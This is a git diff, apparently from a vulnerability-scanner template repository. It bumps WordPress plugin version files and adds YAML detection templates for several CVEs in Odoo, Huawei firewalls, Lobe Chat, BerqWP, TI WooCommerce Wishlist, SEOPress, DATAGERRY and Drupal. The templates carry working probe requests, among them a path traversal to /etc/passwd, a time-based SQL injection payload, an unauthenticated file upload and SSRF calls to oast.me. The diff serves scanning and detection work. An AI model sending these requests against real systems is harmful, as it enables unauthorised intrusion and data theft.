b/helpers/wordpress/plugins/elementor.txt index 057aa0d01e..9d67c4fc45 100644 --- a/helpers/wordpress/plugins/elementor.txt +++ b/helpers/wordpress/plugins/elementor.txt @@ -1 +1 @@ -3.24.4 \ No newline at end of file +3.24.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/extendify.txt b/helpers/wordpress/plugins/extendify.txt new file mode 100644 index 0000000000..d19d089012 --- /dev/null +++ b/helpers/wordpress/plugins/extendify.txt @@ -0,0 +1 @@ +1.15.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/fluentform.txt b/helpers/wordpress/plugins/fluentform.txt index fff6bf312b..e3384b389b 100644 --- a/helpers/wordpress/plugins/fluentform.txt +++ b/helpers/wordpress/plugins/fluentform.txt @@ -1 +1 @@ -5.2.3 \ No newline at end of file +5.2.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/formidable.txt b/helpers/wordpress/plugins/formidable.txt index eecf8f79bf..a297ed2b1f 100644 --- a/helpers/wordpress/plugins/formidable.txt +++ b/helpers/wordpress/plugins/formidable.txt @@ -1 +1 @@ -6.14.1 \ No newline at end of file +6.15 \ No newline at end of file diff --git a/helpers/wordpress/plugins/google-listings-and-ads.txt b/helpers/wordpress/plugins/google-listings-and-ads.txt index 7f04bb11e3..adaf203ace 100644 --- a/helpers/wordpress/plugins/google-listings-and-ads.txt +++ b/helpers/wordpress/plugins/google-listings-and-ads.txt @@ -1 +1 @@ -2.8.5 \ No newline at end of file +2.8.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/hostinger.txt b/helpers/wordpress/plugins/hostinger.txt index e4a0720dd5..d003324bf6 100644 --- a/helpers/wordpress/plugins/hostinger.txt +++ b/helpers/wordpress/plugins/hostinger.txt @@ -1 +1 @@ -3.0.11 \ No newline at end of file +3.0.12 \ No newline at end of file diff --git a/helpers/wordpress/plugins/image-optimization.txt b/helpers/wordpress/plugins/image-optimization.txt index 1d5e9e0bad..63ebd3fe34 100644 --- a/helpers/wordpress/plugins/image-optimization.txt +++ b/helpers/wordpress/plugins/image-optimization.txt @@ -1 +1 @@ -1.5.3 \ No newline at end of file +1.5.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/jetpack.txt b/helpers/wordpress/plugins/jetpack.txt index c90a2e8b7d..c8eea28c61 100644 --- a/helpers/wordpress/plugins/jetpack.txt +++ b/helpers/wordpress/plugins/jetpack.txt @@ -1 +1 @@ -13.8.1 \ No newline at end of file +13.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/kadence-blocks.txt b/helpers/wordpress/plugins/kadence-blocks.txt index ce79e06a33..712bd5a680 100644 --- a/helpers/wordpress/plugins/kadence-blocks.txt +++ b/helpers/wordpress/plugins/kadence-blocks.txt @@ -1 +1 @@ -3.2.54 \ No newline at end of file +3.3.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/loginizer.txt b/helpers/wordpress/plugins/loginizer.txt index ee672d89ab..6f2d3653d5 100644 --- a/helpers/wordpress/plugins/loginizer.txt +++ b/helpers/wordpress/plugins/loginizer.txt @@ -1 +1 @@ -1.9.1 \ No newline at end of file +1.9.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mailpoet.txt b/helpers/wordpress/plugins/mailpoet.txt index fb467b1573..e230c8396d 100644 --- a/helpers/wordpress/plugins/mailpoet.txt +++ b/helpers/wordpress/plugins/mailpoet.txt @@ -1 +1 @@ -5.2.2 \ No newline at end of file +5.3.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/post-smtp.txt b/helpers/wordpress/plugins/post-smtp.txt index 8bcbcd5c81..a44d1506b6 100644 --- a/helpers/wordpress/plugins/post-smtp.txt +++ b/helpers/wordpress/plugins/post-smtp.txt @@ -1 +1 @@ -2.9.8 \ No newline at end of file +2.9.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/premium-addons-for-elementor.txt b/helpers/wordpress/plugins/premium-addons-for-elementor.txt index 59fa9c4976..55854b5d47 100644 --- a/helpers/wordpress/plugins/premium-addons-for-elementor.txt +++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt @@ -1 +1 @@ -4.10.54 \ No newline at end of file +4.10.55 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pretty-link.txt b/helpers/wordpress/plugins/pretty-link.txt index 0da667e1e5..e845c63121 100644 --- a/helpers/wordpress/plugins/pretty-link.txt +++ b/helpers/wordpress/plugins/pretty-link.txt @@ -1 +1 @@ -3.6.8 \ No newline at end of file +3.6.10 \ No newline at end of file diff --git a/helpers/wordpress/plugins/royal-elementor-addons.txt b/helpers/wordpress/plugins/royal-elementor-addons.txt index 817d3b87b4..6ab901b34c 100644 --- a/helpers/wordpress/plugins/royal-elementor-addons.txt +++ b/helpers/wordpress/plugins/royal-elementor-addons.txt @@ -1 +1 @@ -1.3.986 \ No newline at end of file +1.3.987 \ No newline at end of file diff --git a/helpers/wordpress/plugins/seo-by-rank-math.txt b/helpers/wordpress/plugins/seo-by-rank-math.txt index 69ad5901e9..d3038a44d1 100644 --- a/helpers/wordpress/plugins/seo-by-rank-math.txt +++ b/helpers/wordpress/plugins/seo-by-rank-math.txt @@ -1 +1 @@ -1.0.228 \ No newline at end of file +1.0.229 \ No newline at end of file diff --git a/helpers/wordpress/plugins/webp-converter-for-media.txt b/helpers/wordpress/plugins/webp-converter-for-media.txt index 358e78e607..132c6def58 100644 --- a/helpers/wordpress/plugins/webp-converter-for-media.txt +++ b/helpers/wordpress/plugins/webp-converter-for-media.txt @@ -1 +1 @@ -6.1.0 \ No newline at end of file +6.1.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt b/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt index 6acdb44289..26e33797ac 100644 --- a/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt +++ b/helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt @@ -1 +1 @@ -2.0.3 \ No newline at end of file +2.0.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt index 6c9616431f..9f4a0fbc18 100644 --- a/helpers/wordpress/plugins/woocommerce-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-payments.txt @@ -1 +1 @@ -8.2.2 \ No newline at end of file +8.3.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt index 38d56e5e0c..391e98560b 100644 --- a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt @@ -1 +1 @@ -2.9.1 \ No newline at end of file +2.9.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-mail-logging.txt b/helpers/wordpress/plugins/wp-mail-logging.txt new file mode 100644 index 0000000000..32bd932f35 --- /dev/null +++ b/helpers/wordpress/plugins/wp-mail-logging.txt @@ -0,0 +1 @@ +1.12.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-statistics.txt b/helpers/wordpress/plugins/wp-statistics.txt index 76b91118e0..11079fff98 100644 --- a/helpers/wordpress/plugins/wp-statistics.txt +++ b/helpers/wordpress/plugins/wp-statistics.txt @@ -1 +1 @@ -14.10.1 \ No newline at end of file +14.10.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wpforms-lite.txt b/helpers/wordpress/plugins/wpforms-lite.txt index 2494c3a40c..41086c4452 100644 --- a/helpers/wordpress/plugins/wpforms-lite.txt +++ b/helpers/wordpress/plugins/wpforms-lite.txt @@ -1 +1 @@ -1.9.1.2 \ No newline at end of file +1.9.1.3 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-5871.yaml b/http/cves/2017/CVE-2017-5871.yaml new file mode 100644 index 0000000000..2938ea79fc --- /dev/null +++ b/http/cves/2017/CVE-2017-5871.yaml @@ -0,0 +1,43 @@ +id: CVE-2017-5871 + +info: + name: Odoo <= 8.0-20160726 & 9.0 - Open Redirect + author: 1337rokudenashi + severity: medium + description: | + An Open Redirect vulnerability in Odoo versions <= 8.0-20160726 and 9.0. This issue allows an attacker to redirect users to untrusted sites via a crafted URL. + impact: | + Successful exploitation can redirect users to malicious sites, potentially leading to phishing attacks or information theft. + remediation: | + Update Odoo to the latest patched version provided by the vendor. + reference: + - https://sysdream.com/cve-2017-5871-odoo-url-redirection-to/ + - https://nvd.nist.gov/vuln/detail/CVE-2017-5871 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2017-5871 + cwe-id: CWE-601 + cpe: cpe:2.3:a:odoo:odoo:8.0:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + shodan-query: title:"Odoo" + product: odoo + vendor: odoo + tags: cve2017,cve,odoo,redirect + +http: + - method: GET + path: + - "{{BaseURL}}/web/session/logout?redirect=https://oast.me" + - "{{BaseURL}}/web/session/logout?redirect=https%3a%2f%2foast.me%2f" + - "{{BaseURL}}/web/dbredirect?redirect=https%3a%2f%2foast.me%2f" + + stop-at-first-match: true + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' +# digest: 4a0a0047304502210089a9c5c6874a8583d41a9d7bb2cf8add0d71744822a15053780e09a483917f410220452363b98076a1e77b714ec07c3e4769b3731715fb37ae5057c97a0cedc37fda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-19411.yaml b/http/cves/2019/CVE-2019-19411.yaml new file mode 100644 index 0000000000..2b6ce2a285 --- /dev/null +++ b/http/cves/2019/CVE-2019-19411.yaml @@ -0,0 +1,47 @@ +id: CVE-2019-19411 + +info: + name: Huawei Firewall - Local File Inclusion + author: taielab + severity: low + description: | + USG9500 with versions of V500R001C30SPC100, V500R001C30SPC200, V500R001C30SPC600, V500R001C60SPC500, V500R005C00SPC100, V500R005C00SPC200 have an information leakage vulnerability. Due to improper processing of the initialization vector used in a specific encryption algorithm, an attacker who gains access to this cryptographic primitive may exploit this vulnerability to cause the value of the confidentiality associated with its use to be diminished. + reference: + - https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200115-01-firewall-en + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 3.7 + cve-id: CVE-2019-19411 + cwe-id: CWE-665 + epss-score: 0.00078 + epss-percentile: 0.34692 + cpe: cpe:2.3:h:huawei:usg9500:-:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: huawei + product: usg9500 + shodan-query: title:"HUAWEI" + tags: cve,cve2019,huawei,firewall,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/umweb/../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:[x*]:0:0:" + + - type: word + part: header + words: + - "application/octet-stream" + + - type: status + status: + - 200 +# digest: 4a0a0047304502201592da827242899c082ee79fadb679c8f4d09f39015c2826f479656d871f61d8022100b1df18deb058c6e3ab7a79da64776a7d4cecf21ca4f9a2fb6efee7785266ae55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-25094.yaml b/http/cves/2021/CVE-2021-25094.yaml index 68ba25e4a0..afc6b1d6d9 100644 --- a/http/cves/2021/CVE-2021-25094.yaml +++ b/http/cves/2021/CVE-2021-25094.yaml @@ -67,5 +67,4 @@ http: part: body words: - '{{marker}}' - -# digest: 4b0a00483046022100a62b3f63f36af3be3f42ddc00ddcc153014e35c716c0205d7aee49bee6cf7e790221008fac71145d4ce5de5bcb3c91ca09e2f9ceb293f23b84d177b7bf094032cdd3d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220153fe42d9da3230c1e66329688aee8ce542c7c24b46f0e7ff23f0e5a762f5d6f02210096f12035f098a1e3ffc3458060ff7c66d5464327f5800f1c78df9add13efe4fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-29484.yaml b/http/cves/2021/CVE-2021-29484.yaml index ee784b5154..08f5468891 100644 --- a/http/cves/2021/CVE-2021-29484.yaml +++ b/http/cves/2021/CVE-2021-29484.yaml @@ -14,6 +14,8 @@ info: - https://forum.ghost.org/t/critical-security-update-available-for-ghost-4-x/22290 - https://nvd.nist.gov/vuln/detail/CVE-2021-29484 - https://github.com/ARPSyndicate/cvemon + - https://github.com/TryGhost/Ghost/blob/95651b33a66f3240535a61999b292a725f1b3317/core/server/web/admin/views/preview.html + - https://www.sonarsource.com/blog/ghost-admin-takeover/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N cvss-score: 6.8 @@ -40,7 +42,9 @@ http: - type: word part: body words: - - 'XMLHttpRequest.prototype.open' + - 'XMLHttpRequest.prototype.open = XMLHttpRequest.prototype.send' + - 'top.postMessage(' + condition: and - type: word part: header @@ -50,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008708553f92fa889fe94e2e1e0179bc7fce9e53b6ee2b269d9a14da5c3992d9e702201716126335928b1f023b3fe60ebe030afac3410a41de7837f279ac714969465a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e0630c32616a3eb31ee9dd8cdcc4e2bef6dba96a63780a1eb9484e931c9c117d022100b0d86d03f68f6141ecba13c522c2444dcf622337c629dc528073c11afc699f1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-32964.yaml b/http/cves/2024/CVE-2024-32964.yaml new file mode 100644 index 0000000000..ee191d1123 --- /dev/null +++ b/http/cves/2024/CVE-2024-32964.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-32964 + +info: + name: Lobe Chat <= v0.150.5 - Server-Side Request Forgery + author: s4e-io + severity: critical + description: | + Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-32964 + - https://github.com/lobehub/lobe-chat/commit/465665a735556669ee30446c7ea9049a20cc7c37 + - https://github.com/lobehub/lobe-chat/security/advisories/GHSA-mxhq-xw3g-rphc + - https://vulert.com/vuln-db/CVE-2024-32964 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:H + cvss-score: 9 + cve-id: CVE-2024-32964 + cwe-id: CWE-918 + epss-score: 0.00043 + epss-percentile: 0.09599 + metadata: + verified: true + max-request: 2 + vendor: lobehub + product: lobe-chat + fofa-query: icon_hash="1975020705" + tags: cve,cve2024,lobechat,ssrf + +flow: http(1) && http(2) + +http: + - raw: + - | + GET /welcome HTTP/1.1 + Host: {{Hostname}} + + host-redirects: true + matchers: + - type: dsl + dsl: + - 'contains(tolower(body), "lobechat")' + - 'status_code == 200' + condition: and + internal: true + + - raw: + - | + POST /api/proxy HTTP/1.1 + Host: {{Hostname}} + Content-Type: text/plain + + http://oast.me + + matchers: + - type: word + part: response + words: + - "

Interactsh Server

" +# digest: 4a0a00473045022100b6f794837ed630ad876ec08d70900f1d0923d863a28fe24a79bbd794c73691d902207a43d609d6fd37186ea6030b79d368f2d5b616cd4a8b71672448f8c584a903f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-34982.yaml b/http/cves/2024/CVE-2024-34982.yaml index daf62d8e17..ada6a6a693 100644 --- a/http/cves/2024/CVE-2024-34982.yaml +++ b/http/cves/2024/CVE-2024-34982.yaml @@ -19,11 +19,13 @@ info: product: lylme_spage fofa-query: icon_hash="-282504889" tags: cve,cve2024,lylme-spage,rce,intrusive -flow: http(1) && http(2) + variables: string: "{{randstr}}" filename: "{{to_lower(rand_text_alpha(5))}}" +flow: http(1) && http(2) + http: - raw: - | @@ -44,8 +46,10 @@ http: words: - '"code":' - '"msg":' + - '"url":' - 'php"}' condition: and + internal: true - type: status status: @@ -71,4 +75,4 @@ http: - 'contains(body, "{{string}}" )' - 'contains(header, "text/html")' condition: and -# digest: 4a0a00473045022100d6aa315d5179da098583ea0872b86fe414cbc4cda8301de18ddfafb2a93013ae0220177931a6619243ead54124a71f081a30a8e952360d780e51afa8290a31cff24d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202a833bdb9c66a7a2d6dccd0c4233995c70eab492b172a07ab433829e6f0ab5a20220095a5b7e6640637747af5bed4a8e9bc928854d60f34e9166ec9e236dcac74632:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-43160.yaml b/http/cves/2024/CVE-2024-43160.yaml new file mode 100644 index 0000000000..691e6dac5a --- /dev/null +++ b/http/cves/2024/CVE-2024-43160.yaml @@ -0,0 +1,78 @@ +id: CVE-2024-43160 + +info: + name: BerqWP <= 1.7.6 - Arbitrary File Uplaod + author: s4e-io + severity: critical + description: | + The BerqWP Automated All-In-One PageSpeed Optimization Plugin for Core Web Vitals, Cache, CDN, Images, CSS, and JavaScript plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the /api/store_webp.php file in all versions up to, and including, 1.7.6. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. + reference: + - https://github.com/KTN1990/CVE-2024-43160 + - https://nvd.nist.gov/vuln/detail/CVE-2024-43160 + - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/searchpro/berqwp-176-unauthenticated-arbitrary-file-uplaod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2024-43160 + cwe-id: CWE-434 + epss-score: 0.00043 + epss-percentile: 0.09608 + metadata: + verified: true + max-request: 3 + vendor: BerqWP + product: BerqWP + framework: wordpress + publicwww-query: "/wp-content/plugins/searchpro" + tags: cve,cve2024,file-upload,shell,intrusive,wp,wp-plugin,wordpress,searchpro + +variables: + filename: "{{rand_base(12)}}" + num: "{{rand_int(10000000000, 999999999999999)}}" + +flow: | + http(1) && http(2) && http(3) + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body,"/wp-content/plugins/searchpro")' + - 'status_code == 200' + condition: and + internal: true + + - raw: + - | + POST /wp-json/optifer/v1/store-webp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + image="{{base64(num)}}"&url={{filename}}.txt&license_key_hash=d41d8cd98f00b204e9800998ecf8427e + + matchers: + - type: dsl + dsl: + - 'contains(content_type,"application/json")' + - 'status_code == 200' + condition: and + internal: true + + - raw: + - | + GET /{{filename}}.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body,"{{num}}")' + - 'contains(content_type, "text/plain")' + - 'status_code == 200' + condition: and +# digest: 490a0046304402207c3b763d8409c1f056f9231ff01d7446e814c8477f1fa382815f23bdd9b5cb9b02202119bdcb37c9b6eeed2059e458bda1e69c418623934db88f2277de567c6bdcb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-43917.yaml b/http/cves/2024/CVE-2024-43917.yaml new file mode 100644 index 0000000000..1d854f398b --- /dev/null +++ b/http/cves/2024/CVE-2024-43917.yaml @@ -0,0 +1,134 @@ +id: CVE-2024-43917 + +info: + name: WordPress TI WooCommerce Wishlist Plugin <= 2.8.2 - SQL Injection + author: iamnoooob,rootxharsh,pdresearch + severity: critical + description: | + In the latest version (2.8.2 as of writing the article) and below, the plugin is vulnerable to a SQL injection vulnerability that allows any users to execute arbitrary SQL queries in the database of the WordPress site. No privileges are required to exploit the issue. The vulnerability is unpatched on the latest version and is tracked as the CVE-2024-43917. + reference: + - https://patchstack.com/articles/unpatched-sql-injection-vulnerability-in-ti-woocommerce-wishlist-plugin/ + - https://patchstack.com/database/vulnerability/ti-woocommerce-wishlist/wordpress-ti-woocommerce-wishlist-plugin-2-8-2-sql-injection-vulnerability?_s_id=cve + - https://nvd.nist.gov/vuln/detail/CVE-2024-43917 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-43917 + cwe-id: CWE-89 + epss-score: 0.00091 + epss-percentile: 0.39641 + cpe: cpe:2.3:a:templateinvaders:ti_woocommerce_wishlist:*:*:*:*:free:wordpress:*:* + metadata: + verified: true + max-request: 4 + vendor: templateinvaders + product: ti_woocommerce_wishlist + framework: wordpress + fofa-query: body="/wp-content/plugins/ti-woocommerce-wishlist/" + publicwww-query: "/wp-content/plugins/ti-woocommerce-wishlist/" + tags: cve,cve2024,wp,wordpress,ti-woocommerce-wishlist,wp-plugin,sqli + +flow: http(1) && http(2) && http(3) && http(4) + +http: + - raw: + - | + GET /?p=1 HTTP/1.1 + Host: {{Hostname}} + + redirects: true + extractors: + - type: regex + part: body + internal: true + name: nonce + group: 1 + regex: + - '"nonce":"([a-z0-9]+)"' + + - raw: + - | + GET /product-category/uncategorized/ HTTP/1.1 + Host: {{Hostname}} + + extractors: + - type: regex + part: body + internal: true + name: product_id + group: 1 + regex: + - 'data-tinvwl_product_id="([0-9]+)"' + + matchers: + - type: word + part: body + words: + - 'data-tinvwl_product_id="' + internal: true + + - raw: + - | + POST /product-category/uncategorized/ HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: XMLHttpRequest + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryNfcbSwJQX8ALWCMG + + ------WebKitFormBoundaryNfcbSwJQX8ALWCMG + Content-Disposition: form-data; name="form[tinvwl-hidden-fields]" + + [] + ------WebKitFormBoundaryNfcbSwJQX8ALWCMG + Content-Disposition: form-data; name="tinv_wishlist_id" + + + ------WebKitFormBoundaryNfcbSwJQX8ALWCMG + Content-Disposition: form-data; name="tinv_wishlist_name" + + + ------WebKitFormBoundaryNfcbSwJQX8ALWCMG + Content-Disposition: form-data; name="product_type" + + simple + ------WebKitFormBoundaryNfcbSwJQX8ALWCMG + Content-Disposition: form-data; name="product_id" + + {{product_id}} + ------WebKitFormBoundaryNfcbSwJQX8ALWCMG + Content-Disposition: form-data; name="product_variation" + + 0 + ------WebKitFormBoundaryNfcbSwJQX8ALWCMG + Content-Disposition: form-data; name="product_action" + + addto + ------WebKitFormBoundaryNfcbSwJQX8ALWCMG + Content-Disposition: form-data; name="redirect" + + {{RootURL}}/product-category/uncategorized/ + ------WebKitFormBoundaryNfcbSwJQX8ALWCMG-- + + extractors: + - type: json + part: body + name: share_key + internal: true + json: + - '.wishlist.share_key' + + - raw: + - | + @timeout: 20s + GET /wp-json/wc/v3/wishlist/{{share_key}}/get_products?order=,(select*from(select(sleep(6)))a)--+- HTTP/1.1 + Host: {{Hostname}} + X-WP-Nonce: {{nonce}} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - "duration>=6" + - "contains(content_type, 'application/json')" + - "contains(body, 'product_id')" + condition: and +# digest: 490a0046304402207690eca3604b0ae310218e3e09ed7e01283fe3cd0058c463ba97588995b8fe2c02201c44b9bac4f09f86ce9b93a397b2f8753abade9745a84a35132428a34c99c286:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-45440.yaml b/http/cves/2024/CVE-2024-45440.yaml new file mode 100644 index 0000000000..0b4249cf15 --- /dev/null +++ b/http/cves/2024/CVE-2024-45440.yaml @@ -0,0 +1,47 @@ +id: CVE-2024-45440 + +info: + name: Drupal 11.x-dev - Full Path Disclosure + author: DhiyaneshDK + severity: medium + description: | + core/authorize.php in Drupal 11.x-dev allows Full Path Disclosure (even when error logging is None) if the value of hash_salt is file_get_contents of a file that does not exist. + reference: + - https://senscybersecurity.nl/CVE-2024-45440-Explained/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-45440 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-45440 + cwe-id: CWE-209 + epss-score: 0.00046 + epss-percentile: 0.17715 + cpe: cpe:2.3:a:drupal:drupal:2023-05-09:*:*:*:*:*:*:* + metadata: + max-request: 1 + verified: true + vendor: drupal + product: drupal + shodan-query: + - http.component:"drupal" + - cpe:"cpe:2.3:a:drupal:drupal" + tags: cve,cve2024,drupal,exposure,error + +http: + - method: GET + path: + - "{{BaseURL}}/core/authorize.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "getHashSalt" + - "RuntimeException" + condition: and + + - type: status + status: + - 200 +# digest: 490a00463044022054ed249c58d1f97eacc44eec47d392c89f94f74b2c5b5e77d298817beb19de4302204074bcf02eae57de46bf5175d3bd645a995584246f4cf7349bd9f71e4246f905:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-46627.yaml b/http/cves/2024/CVE-2024-46627.yaml new file mode 100644 index 0000000000..e8207180f9 --- /dev/null +++ b/http/cves/2024/CVE-2024-46627.yaml @@ -0,0 +1,51 @@ +id: CVE-2024-46627 + +info: + name: DATAGERRY - REST API Auth Bypass + author: gy741 + severity: critical + description: | + Incorrect access control in BECN DATAGERRY v2.2 allows attackers to execute arbitrary commands via crafted web requests. + impact: | + Allows unauthorized access to REST API + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-46627 + - https://daly.wtf/cve-2024-46627-incorrect-access-control-in-becn-datagerry-v2-2-allows-attackers-to-execute-arbitrary-commands-via-crafted-web-requests/ + - https://datagerry.com/ + - https://github.com/DATAGerry/ + - https://github.com/d4lyw/CVE-2024-46627 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N + cvss-score: 9.1 + cve-id: CVE-2024-46627 + cwe-id: CWE-284 + epss-score: 0.00045 + epss-percentile: 0.16328 + metadata: + verified: true + max-request: 1 + vendor: becon + product: datagerry + shodan-query: http.title:"datagerry" + tags: cve,cve2024,becon,datagerry,unauth,auth-bypass + +http: + - method: GET + path: + - '{{BaseURL}}/rest/users/1/settings/' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"response_type":' + - '"model":' + - '"time":' + condition: and + + - type: word + part: content_type + words: + - "application/json" +# digest: 4a0a00473045022040420efc711ffd5727fa72189da9f4e2830a0a1bd247edefb9c4392206bdcb5f022100c7c5849fa2e4cdc7240166da0a6077f3c93557cbded880103e8580c784fdb3f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-5488.yaml b/http/cves/2024/CVE-2024-5488.yaml new file mode 100644 index 0000000000..9a062db1b1 --- /dev/null +++ b/http/cves/2024/CVE-2024-5488.yaml @@ -0,0 +1,70 @@ +id: CVE-2024-5488 + +info: + name: SEOPress < 7.9 - Authentication Bypass + author: pdresearch,iamnoooob,rootxharsh + severity: critical + description: | + The SEOPress WordPress plugin before 7.9 does not properly protect some of its REST API routes, which combined with another Object Injection vulnerability can allow unauthenticated attackers to unserialize malicious gadget chains, compromising the site if a suitable chain is present. + reference: + - https://wpscan.com/blog/object-injection-vulnerability-fixed-in-seopress-7-9/ + - https://wpscan.com/vulnerability/28507376-ded0-4e1a-b2fc-2182895aa14c/ + - https://github.com/fkie-cad/nvd-json-data-feeds + - https://nvd.nist.gov/vuln/detail/CVE-2024-5488 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-5488 + epss-score: 0.00043 + epss-percentile: 0.09608 + metadata: + verified: true + max-request: 3 + tags: cve,cve2024,wp,wordpress,wp-plugin,seopress,auth-bypass + +flow: http(1) && http(2) && http(3) + +variables: + marker: "{{randstr}}" + username: "admin" + +http: + - raw: + - | + PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + part: body + words: + - 'Sorry, you are not allowed to do that.' + internal: true + + - raw: + - | + PUT /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username+':aaaaaa')}} + Content-Type: application/x-www-form-urlencoded + + title={{marker}}&description={{marker}} + + matchers: + - type: word + part: body + words: + - '"code":"success"' + internal: true + + - raw: + - | + GET /wp-json/seopress/v1/posts/1/title-description-metas HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + part: body + words: + - '"title":"{{marker}}","description":"{{marker}}"' +# digest: 4a0a00473045022100c95d50e7ed0073b424b5b0259135b11ea7bdca7a18c8b8f5ec23b5cb197c95860220742e8b72bc5d7d64ffdc413ce427470f0b96f7c9a4cc53c5d0298cfa2efe112d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-6517.yaml b/http/cves/2024/CVE-2024-6517.yaml new file mode 100644 index 0000000000..b8fedddac6 --- /dev/null +++ b/http/cves/2024/CVE-2024-6517.yaml @@ -0,0 +1,68 @@ +id: CVE-2024-6517 + +info: + name: Contact Form 7 Math Captcha <= 2.0.1 - Cross-site Scripting + author: s4e-io + severity: medium + description: | + The Contact Form 7 Math Captcha WordPress plugin through 2.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users. + reference: + - 